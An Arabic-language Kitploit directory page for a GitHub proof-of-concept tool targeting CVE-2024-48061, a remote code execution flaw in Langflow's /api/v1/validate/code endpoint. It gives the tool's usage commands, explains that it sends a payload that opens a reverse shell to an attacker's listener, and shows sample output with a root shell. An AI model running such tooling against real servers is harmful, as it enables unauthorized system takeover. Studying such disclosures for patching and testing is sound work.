Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/bwithe/cve-2024-48061
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubbwithe/cve-2024-48061

CVE-2024-48061

CVE-2024-48061 Langflow معرض لتنفيذ التعليمات البرمجية عن بُعد. Poc

عرض المستودع
7منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-48061 Langflow عرضة لتنفيذ التعليمات البرمجية عن بُعد

CVE-2024-48061 إثبات المفهوم

الاستخدام

root@kitploit:~
python3 poc.py -i <web_ip> -p <web_port> -l <listener_ip> -lp <listener_port>

الوصف

يستغل هذا السكريبت نقطة نهاية API ضعيفة في /api/v1/validate/code على خادم الويب المستهدف. يتحقق أولاً من وجود المسار الضعيف، ثم يبدأ مستمع TCP على عنوان IP ومنفذ المستمع المحددين. بمجرد أن يصبح المستمع جاهزًا، يرسل حمولة مصممة خصيصًا للهدف لاستدعاء شيل عكسي يتصل بالمستمع.

مثال

  • محاولة ناجحة
root@kitploit:~
python3 poc3.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 4444
[+] تم اكتشاف الثغرة في http://192.168.0.2:7860/api/v1/validate/code
[+] الاستماع على 192.168.0.3:4444 ...
[+] إرسال الحمولة إلى http://192.168.0.2:7860/api/v1/validate/code
[+] اتصال من 192.168.0.2:60440
# whoami
whoami
root
# exit
[*] الخروج من الشيل.
  • محاولة فاشلة
root@kitploit:~
python3 poc3.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 4444
[-] لا يبدو أنها ضعيفة
تنزيل الأداة